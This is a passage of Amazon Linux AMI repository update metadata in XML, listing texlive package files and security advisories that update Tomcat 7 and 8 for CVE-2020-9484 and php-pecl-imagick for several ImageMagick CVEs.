arch="noarch"><filename>Packages/texlive-listings-doc-svn15878.1.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-makecmds" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-makecmds-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-parallel" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-parallel-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-kpathsea" version="svn28792.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-kpathsea-svn28792.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-underscore-doc" version="svn18261.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-underscore-doc-svn18261.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-cmap-doc" version="svn26568.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-cmap-doc-svn26568.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-hyph-utf8" version="svn29641.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-hyph-utf8-svn29641.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-xeindex" version="svn16760.0.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xeindex-svn16760.0.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-fix2col-doc" version="svn17133.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fix2col-doc-svn17133.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-placeins-doc" version="svn19848.2.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-placeins-doc-svn19848.2.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-ctable" version="svn26694.1.23" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ctable-svn26694.1.23-45.amzn1.noarch.rpm</filename></package><package 
name="texlive-ae-doc" version="svn15878.1.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ae-doc-svn15878.1.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-threeparttable" version="svn17383.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-threeparttable-svn17383.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-geometry-doc" version="svn19716.5.6" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-geometry-doc-svn19716.5.6-45.amzn1.noarch.rpm</filename></package><package name="texlive-metalogo" version="svn18611.0.12" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-metalogo-svn18611.0.12-45.amzn1.noarch.rpm</filename></package><package name="texlive-attachfile-doc" version="svn21866.v1.5b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-attachfile-doc-svn21866.v1.5b-45.amzn1.noarch.rpm</filename></package><package name="texlive-thumbpdf" version="svn26689.3.15" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-thumbpdf-svn26689.3.15-45.amzn1.noarch.rpm</filename></package><package name="texlive-subfigure" version="svn15878.2.1.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-subfigure-svn15878.2.1.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-collection-htmlxml" version="svn28251.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-collection-htmlxml-svn28251.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-luaotfload-bin" version="svn18579.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-luaotfload-bin-svn18579.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-etoolbox-doc" version="svn20922.2.1" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-etoolbox-doc-svn20922.2.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-euenc" version="svn19795.0.1h" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-euenc-svn19795.0.1h-45.amzn1.noarch.rpm</filename></package><package name="texlive-bibtex-doc" version="svn26689.0.99d" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-bibtex-doc-svn26689.0.99d-45.amzn1.noarch.rpm</filename></package><package name="texlive-cmap" version="svn26568.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-cmap-svn26568.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-appendix-doc" version="svn15878.1.2b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-appendix-doc-svn15878.1.2b-45.amzn1.noarch.rpm</filename></package><package name="texlive-euler-doc" version="svn17261.2.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-euler-doc-svn17261.2.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-iftex-doc" version="svn29654.0.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-iftex-doc-svn29654.0.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-mathspec-doc" version="svn15878.0.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mathspec-doc-svn15878.0.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-ifxetex" version="svn19685.0.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ifxetex-svn19685.0.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-metafont-bin" version="svn26912.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-metafont-bin-svn26912.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-framed-doc" version="svn26789.0.96" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-framed-doc-svn26789.0.96-45.amzn1.noarch.rpm</filename></package><package name="texlive-ptext" version="svn28124.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ptext-svn28124.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-pdftex-doc" version="svn29585.1.40.11" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pdftex-doc-svn29585.1.40.11-45.amzn1.noarch.rpm</filename></package><package name="texlive-typehtml-doc" version="svn17134.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-typehtml-doc-svn17134.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-kastrup-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-kastrup-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-tools" version="svn26263.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-tools-svn26263.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-marvosym-doc" version="svn29349.2.2a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-marvosym-doc-svn29349.2.2a-45.amzn1.noarch.rpm</filename></package><package name="texlive-epstopdf-bin" version="svn18336.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-epstopdf-bin-svn18336.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-xecolor-doc" version="svn29660.0.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xecolor-doc-svn29660.0.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-subfig" version="svn15878.1.3" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-subfig-svn15878.1.3-45.amzn1.noarch.rpm</filename></package><package name="texlive-fancyvrb-doc" version="svn18492.2.8" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-fancyvrb-doc-svn18492.2.8-45.amzn1.noarch.rpm</filename></package><package name="texlive-cjk-doc" version="svn26296.4.8.3" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-cjk-doc-svn26296.4.8.3-45.amzn1.noarch.rpm</filename></package><package name="texlive-qstest" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-qstest-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-fancybox" version="svn18304.1.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fancybox-svn18304.1.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-makeindex" version="svn26689.2.12" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-makeindex-svn26689.2.12-45.amzn1.noarch.rpm</filename></package><package name="texlive-lettrine-doc" version="svn29391.1.64" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-lettrine-doc-svn29391.1.64-45.amzn1.noarch.rpm</filename></package><package name="texlive-jadetex-bin" version="svn3006.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-jadetex-bin-svn3006.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-varwidth" version="svn24104.0.92" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-varwidth-svn24104.0.92-45.amzn1.noarch.rpm</filename></package><package name="texlive-svn-prov-doc" version="svn18017.3.1862" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-svn-prov-doc-svn18017.3.1862-45.amzn1.noarch.rpm</filename></package><package name="texlive-jknapltx" version="svn19440.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-jknapltx-svn19440.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-sepnum-doc" version="svn20186.2.0" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-sepnum-doc-svn20186.2.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-bigfoot" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-bigfoot-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-cm-lgc" version="svn28250.0.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-cm-lgc-svn28250.0.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-powerdot" version="svn25656.1.4i" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-powerdot-svn25656.1.4i-45.amzn1.noarch.rpm</filename></package><package name="texlive-beton" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-beton-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-latex" version="svn27907.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-latex-svn27907.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-babelbib-doc" version="svn25245.1.31" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-babelbib-doc-svn25245.1.31-45.amzn1.noarch.rpm</filename></package><package name="texlive-xdvi" version="svn26689.22.85" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xdvi-svn26689.22.85-45.amzn1.noarch.rpm</filename></package><package name="texlive-l3packages" version="svn29361.SVN_4467" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-l3packages-svn29361.SVN_4467-45.amzn1.noarch.rpm</filename></package><package name="texlive-xmltex-doc" version="svn28273.0.8" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xmltex-doc-svn28273.0.8-45.amzn1.noarch.rpm</filename></package><package name="texlive-realscripts" version="svn29423.0.3b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-realscripts-svn29423.0.3b-45.amzn1.noarch.rpm</filename></package><package 
name="texlive-symbol" version="svn28614.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-symbol-svn28614.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-section" version="svn20180.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-section-svn20180.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-tex-gyre" version="svn18651.2.004" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-tex-gyre-svn18651.2.004-45.amzn1.noarch.rpm</filename></package><package name="texlive-url" version="svn16864.3.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-url-svn16864.3.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-soul-doc" version="svn15878.2.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-soul-doc-svn15878.2.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-textpos-doc" version="svn28261.1.7h" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-textpos-doc-svn28261.1.7h-45.amzn1.noarch.rpm</filename></package><package name="texlive-ifluatex" version="svn26725.1.3" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ifluatex-svn26725.1.3-45.amzn1.noarch.rpm</filename></package><package name="texlive-sectsty-doc" version="svn15878.2.0.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-sectsty-doc-svn15878.2.0.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-xesearch" version="svn16041.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xesearch-svn16041.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-eurosym" version="svn17265.1.4_subrfix" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-eurosym-svn17265.1.4_subrfix-45.amzn1.noarch.rpm</filename></package><package name="texlive-scheme-basic" version="svn25923.0" release="45.20130427_r30134.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-scheme-basic-svn25923.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-xcolor-doc" version="svn15878.2.11" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xcolor-doc-svn15878.2.11-45.amzn1.noarch.rpm</filename></package><package name="texlive-dvips-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-dvips-bin-svn26509.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-gsftopk" version="svn26689.1.19.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-gsftopk-svn26689.1.19.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-latex-bin-bin" version="svn14050.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-latex-bin-bin-svn14050.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-filecontents" version="svn24250.1.3" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-filecontents-svn24250.1.3-45.amzn1.noarch.rpm</filename></package><package name="texlive-jadetex" version="svn23409.3.13" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-jadetex-svn23409.3.13-45.amzn1.noarch.rpm</filename></package><package name="texlive-arphic-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-arphic-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-eso-pic-doc" version="svn21515.2.0c" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-eso-pic-doc-svn21515.2.0c-45.amzn1.noarch.rpm</filename></package><package name="texlive-mfnfss-doc" version="svn19410.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mfnfss-doc-svn19410.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-jadetex-doc" version="svn23409.3.13" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-jadetex-doc-svn23409.3.13-45.amzn1.noarch.rpm</filename></package><package name="texlive-changepage-doc" version="svn15878.1.0c" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-changepage-doc-svn15878.1.0c-45.amzn1.noarch.rpm</filename></package><package name="texlive-xetex-def" version="svn29154.0.95" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xetex-def-svn29154.0.95-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-grad-doc" version="svn15878.1.06" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-grad-doc-svn15878.1.06-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-blur" version="svn15878.2.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-blur-svn15878.2.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-luatex" version="svn26689.0.70.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-luatex-svn26689.0.70.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-texlive.infra-bin" version="svn22566.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-texlive.infra-bin-svn22566.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-gsftopk-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-gsftopk-bin-svn26509.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-makeindex-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-makeindex-bin-svn26509.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-xdvi-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-xdvi-bin-svn26509.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-fontware-bin" 
version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-fontware-bin-svn26509.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-debuginfo" version="2012" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-debuginfo-2012-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-xetex-bin" version="svn26912.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-xetex-bin-svn26912.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-metapost-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-metapost-bin-svn26509.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-pdftex-bin" version="svn27321.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-pdftex-bin-svn27321.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-kpathsea-bin" version="svn27347.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-kpathsea-bin-svn27347.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-metafont-bin" version="svn26912.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-metafont-bin-svn26912.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive" version="2012" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-2012-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-bibtex-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-bibtex-bin-svn26509.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-dvipdfmx-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" 
arch="i686"><filename>Packages/texlive-dvipdfmx-bin-svn26509.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-kpathsea-lib" version="2012" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-kpathsea-lib-2012-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-kpathsea-lib-devel" version="2012" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-kpathsea-lib-devel-2012-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-dvipng-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-dvipng-bin-svn26509.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-mfware-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-mfware-bin-svn26509.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-tex4ht-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-tex4ht-bin-svn26509.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-dvips-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-dvips-bin-svn26509.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-luatex-bin" version="svn26912.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-luatex-bin-svn26912.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-tex-bin" version="svn26912.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-tex-bin-svn26912.0-45.20130427_r30134.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2020-1389</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1389: important priority package update for tomcat7</title><issued date="2020-06-23 06:45:00" /><updated date="2020-06-26 04:47:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-9484:
When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server; and b) the server is configured to use the PersistenceManager with a FileStore; and c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control. Note that all of conditions a) to d) must be true for the attack to succeed.
1838332: CVE-2020-9484 tomcat: deserialization flaw in session persistence storage leading to RCE
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9484" title="" id="CVE-2020-9484" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-jsp-2.2-api" version="7.0.104" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.104-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.104" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.104-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.104" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.104-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.104" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.104-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.104" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.104-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.104" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.104-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.104" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.104-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.104" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.104-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.104" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.104-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.104" release="1.38.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.104-1.38.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1390</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1390: important priority package update for tomcat8</title><issued date="2020-06-23 06:47:00" /><updated date="2020-06-26 04:57:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-9484:
When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server; and b) the server is configured to use the PersistenceManager with a FileStore; and c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control. Note that all of conditions a) to d) must be true for the attack to succeed.
1838332: CVE-2020-9484 tomcat: deserialization flaw in session persistence storage leading to RCE
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9484" title="" id="CVE-2020-9484" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8" version="8.5.56" release="1.84.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.56-1.84.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.56" release="1.84.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.56-1.84.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.56" release="1.84.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.56-1.84.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.56" release="1.84.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.56-1.84.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.56" release="1.84.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.56-1.84.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.56" release="1.84.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.56-1.84.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.56" release="1.84.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.56-1.84.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.56" release="1.84.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.56-1.84.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.56" release="1.84.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.56-1.84.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.56" release="1.84.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.56-1.84.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1391</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1391: medium priority package update for php-pecl-imagick</title><issued date="2020-06-23 07:03:00" /><updated date="2020-07-15 17:39:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9956:
In ImageMagick 7.0.8-35 Q16, there is a stack-based buffer overflow in the function PopHexPixel of coders/ps.c, which allows an attacker to cause a denial of service or code execution via a crafted image file.
1692300: CVE-2019-9956 imagemagick: stack-based buffer overflow in function PopHexPixel in coders/ps.c
CVE-2019-7398:
In ImageMagick before 7.0.8-25, a memory leak exists in WriteDIBImage in coders/dib.c.
1672560: CVE-2019-7398 ImageMagick: Memory leak in the WriteDIBImage function in coders/dib.c
CVE-2019-7397:
In ImageMagick before 7.0.8-25 and GraphicsMagick through 1.3.31, several memory leaks exist in WritePDFImage in coders/pdf.c.
1672564: CVE-2019-7397 ImageMagick: Memory leak in the WritePDFImage function in coders/pdf.c
CVE-2019-7175:
In ImageMagick before 7.0.8-25, some memory leaks exist in DecodeImage in coders/pcd.c.
1687436: CVE-2019-7175 imagemagick: memory leak in function DecodeImage in coders/pcd.c
CVE-2019-19949:
In ImageMagick 7.0.8-43 Q16, there is a heap-based buffer over-read in the function WritePNGImage of coders/png.c, related to Magick_png_write_raw_profile and LocaleNCompare.
1792480: CVE-2019-19949 ImageMagick: heap-based buffer over-read in WritePNGImage in coders/png.c
CVE-2019-19948:
In ImageMagick 7.0.8-43 Q16, there is a heap-based buffer overflow in the function WriteSGIImage of coders/sgi.c.
1793177: CVE-2019-19948 ImageMagick: heap-based buffer overflow in WriteSGIImage in coders/sgi.c
CVE-2019-17541:
ImageMagick before 7.0.8-55 has a use-after-free in DestroyStringInfo in MagickCore/string.c because the error manager is mishandled in coders/jpeg.c.
1767087: CVE-2019-17541 ImageMagick: Use after free in ReadICCProfile function in coders/jpeg.c
CVE-2019-17540:
ImageMagick before 7.0.8-54 has a heap-based buffer overflow in ReadPSInfo in coders/ps.c.
1765330: CVE-2019-17540 ImageMagick: heap-based buffer overflow in ReadPSInfo in coders/ps.c
CVE-2019-16713:
ImageMagick 7.0.8-43 has a memory leak in coders/dot.c, as demonstrated by PingImage in MagickCore/constitute.c.
1801681: CVE-2019-16713 ImageMagick: memory leak in coders/dot.c
CVE-2019-16712:
